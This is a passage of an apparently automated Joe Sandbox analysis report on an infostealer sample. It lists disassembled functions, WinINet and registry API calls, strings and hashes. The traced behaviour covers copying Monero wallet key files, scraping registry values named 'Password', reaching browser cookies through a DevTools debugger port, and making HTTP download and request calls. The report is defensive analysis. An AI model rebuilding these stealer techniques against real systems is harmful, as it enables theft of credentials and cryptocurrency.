                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                    • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                    • API String ID: 3174675846-3542011879
                                    • Opcode ID: 5603ae3171f4158fb47eeb690ce014dd485b2660926a589f38c853312e816775
                                    • Instruction ID: 18cf21489e22ef64c717ab9f5b7304b9aa1f5b0d6a2bc18e11147fb8c2d575e5
                                    • Opcode Fuzzy Hash: 5603ae3171f4158fb47eeb690ce014dd485b2660926a589f38c853312e816775
                                    • Instruction Fuzzy Hash: 5D515DB1D10608ABDF14EBE4DCA5FEE7738AF15301F404698F10AA7191EB706A49CF61
                                    Function 001A5510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 001962D0: InternetOpenA.WININET(001B0DFF,00000001,00000000,00000000,00000000), ref: 00196331
                                      • Part of subcall function 001962D0: StrCmpCA.SHLWAPI(?,00E2EBB0), ref: 00196353
                                      • Part of subcall function 001962D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00196385
                                      • Part of subcall function 001962D0: HttpOpenRequestA.WININET(00000000,GET,?,00E2E2C0,00000000,00000000,00400100,00000000), ref: 001963D5
                                      • Part of subcall function 001962D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0019640F
                                      • Part of subcall function 001962D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00196421
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001A5568
                                    • lstrlen.KERNEL32(00000000), ref: 001A557F
                                      • Part of subcall function 001A8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001A8FE2
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 001A55B4
                                    • lstrlen.KERNEL32(00000000), ref: 001A55D3
                                    • lstrlen.KERNEL32(00000000), ref: 001A55FE
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: fd6a3a446d6461f8602ce40f78ac26d6bcfa37c03c317b43934defe27e1d990b
                                    • Instruction ID: ddad0fb03dd78f76f5f1267aa8726b4b521d5d80df8cb2d3edc2963eb3507179
                                    • Opcode Fuzzy Hash: fd6a3a446d6461f8602ce40f78ac26d6bcfa37c03c317b43934defe27e1d990b
                                    • Instruction Fuzzy Hash: 6D512078A10109EBCB58FFB0CDA6AED7779AF22340F904458F50A67591EF306B44CB62
                                    Function 00191310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001912A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001912B4
                                      • Part of subcall function 001912A0: RtlAllocateHeap.NTDLL(00000000), ref: 001912BB
                                      • Part of subcall function 001912A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001912D7
                                      • Part of subcall function 001912A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001912F5
                                      • Part of subcall function 001912A0: RegCloseKey.ADVAPI32(?), ref: 001912FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 0019134F
                                    • lstrlen.KERNEL32(?), ref: 0019135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00191377
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001A8CF0: GetSystemTime.KERNEL32(001B0E1B,00E2AB38,001B05B6,?,?,001913F9,?,0000001A,001B0E1B,00000000,?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001A8D16
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00191465
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 0019A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0019A13C
                                      • Part of subcall function 0019A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0019A161
                                      • Part of subcall function 0019A110: LocalAlloc.KERNEL32(00000040,?), ref: 0019A181
                                      • Part of subcall function 0019A110: ReadFile.KERNEL32(000000FF,?,00000000,0019148F,00000000), ref: 0019A1AA
                                      • Part of subcall function 0019A110: LocalFree.KERNEL32(0019148F), ref: 0019A1E0
                                      • Part of subcall function 0019A110: CloseHandle.KERNEL32(000000FF), ref: 0019A1EA
                                    • DeleteFileA.KERNEL32(00000000), ref: 001914EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: 3387f5a36f9521f2e94d3c5812f27051f64ab7f4320876d93a30ed11086d172a
                                    • Instruction ID: a4c47b9bf941b36a23f3690bea87087a25a8c772f0bc2595b56e72d1a30fb2bf
                                    • Opcode Fuzzy Hash: 3387f5a36f9521f2e94d3c5812f27051f64ab7f4320876d93a30ed11086d172a
                                    • Instruction Fuzzy Hash: 875163B5D502195BCB55FB60DC92FED737C9F65300F8045E8B60A62092EF706B88CBA6
                                    Function 00199A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenA.WININET(001B0AF6,00000001,00000000,00000000,00000000), ref: 00199A6A
                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00199AAB
                                    • InternetCloseHandle.WININET(00000000), ref: 00199AC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$Open$CloseHandle
                                    • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                    • API String ID: 3289985339-2144369209
                                    • Opcode ID: d5f98675626f8795f7c51c8854a22b35bf1a2cbcceeec875ea763f21e1080e86
                                    • Instruction ID: f0dd6b44f6f2edd7f43657a48c1a8e1c846a04a926d8652c89f6c89fe7eeb1e9
                                    • Opcode Fuzzy Hash: d5f98675626f8795f7c51c8854a22b35bf1a2cbcceeec875ea763f21e1080e86
                                    • Instruction Fuzzy Hash: 37413A75A50258AFCF14EFA4CC95FDD7778BB58740F104099F50AAB290DBB4AE80CB64
                                    Function 00197630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00197330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0019739A
                                      • Part of subcall function 00197330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00197411
                                      • Part of subcall function 00197330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0019746D
                                      • Part of subcall function 00197330: GetProcessHeap.KERNEL32(00000000,?), ref: 001974B2
                                      • Part of subcall function 00197330: HeapFree.KERNEL32(00000000), ref: 001974B9
                                    • lstrcat.KERNEL32(00000000,001B192C), ref: 00197666
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 001976A8
                                    • lstrcat.KERNEL32(00000000, : ), ref: 001976BA
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 001976EF
                                    • lstrcat.KERNEL32(00000000,001B1934), ref: 00197700
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00197733
                                    • lstrcat.KERNEL32(00000000,001B1938), ref: 0019774D
                                    • task.LIBCPMTD ref: 0019775B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                    • String ID: :
                                    • API String ID: 2677904052-3653984579
                                    • Opcode ID: 1e01fa9959f01f34a4b010a292319185e77bb6cfeb2dbba66a26344271b7db2f
                                    • Instruction ID: d601b538ade5cdcb3209326ab72967fa3844c947bc537363ed71e6a2b9258a83
                                    • Opcode Fuzzy Hash: 1e01fa9959f01f34a4b010a292319185e77bb6cfeb2dbba66a26344271b7db2f
                                    • Instruction Fuzzy Hash: 5E317E75A04108EFDF08EBE0DCA5DFF7379AF55305B504128F106A32A0EB74A946CBA6
                                    Function 001960F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 00194800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00194889
                                      • Part of subcall function 00194800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00194899
                                    • InternetOpenA.WININET(001B0DFB,00000001,00000000,00000000,00000000), ref: 0019615F
                                    • StrCmpCA.SHLWAPI(?,00E2EBB0), ref: 00196197
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 001961DF
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00196203
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 0019622C
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0019625A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00196299
                                    • InternetCloseHandle.WININET(?), ref: 001962A3
                                    • InternetCloseHandle.WININET(00000000), ref: 001962B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: cdf7f58ec24b3e4fb7fa2f731f702f33eae26fe376975d4026efa36d2692b5ad
                                    • Instruction ID: a878187e4fb60d99496d05922ba0fee41f3ee7c4e290024e3b37f04ad04b913e
                                    • Opcode Fuzzy Hash: cdf7f58ec24b3e4fb7fa2f731f702f33eae26fe376975d4026efa36d2692b5ad
                                    • Instruction Fuzzy Hash: D25196B1A40208ABDF24DF90CC45FEE7779AF45305F4081A9F605A71C0DBB4AA89CFA5
                                    Function 0021012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • type_info::operator==.LIBVCRUNTIME ref: 0021024D
                                    • ___TypeMatch.LIBVCRUNTIME ref: 0021035B
                                    • CatchIt.LIBVCRUNTIME ref: 002103AC
                                    • CallUnexpected.LIBVCRUNTIME ref: 002104C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 2356445960-393685449
                                    • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction ID: 3e9a569b51d601ff844a128911beacc62036817a6296a05f8afda65f1f07c06d
                                    • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction Fuzzy Hash: E6B17C7182020AEFCF25EFA4C9C19EEB7B5BF24310B14415AE9156B252D7B0DAE1CF91
                                    Function 00197330 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0019739A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00197411
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0019746D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 001974B2
                                    • HeapFree.KERNEL32(00000000), ref: 001974B9
                                    • task.LIBCPMTD ref: 001975B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuetask
                                    • String ID: Password
                                    • API String ID: 775622407-3434357891
                                    • Opcode ID: 9f3e89a4b050e332f58d0894ad659defe754c2e3437e241792bce10597eeafad
                                    • Instruction ID: e435d6b2c2ba23c30671dcfd751d055699212914f39e520af618bd757b6547c3
                                    • Opcode Fuzzy Hash: 9f3e89a4b050e332f58d0894ad659defe754c2e3437e241792bce10597eeafad
                                    • Instruction Fuzzy Hash: FC613BB59141689BDF24DB50CC51BDAB7B8BF58304F0081E9E649A6181EFB06FC9CFA1
                                    Function 001A4300 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 124registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00E2DD08,00000000,00020119,?), ref: 001A4344
                                    • RegQueryValueExA.ADVAPI32(?,00E2E668,00000000,00000000,00000000,000000FF), ref: 001A4368
                                    • RegCloseKey.ADVAPI32(?), ref: 001A4372
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A4397
                                    • lstrcat.KERNEL32(?,00E2E680), ref: 001A43AB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID: h$x
                                    • API String ID: 690832082-1467089736
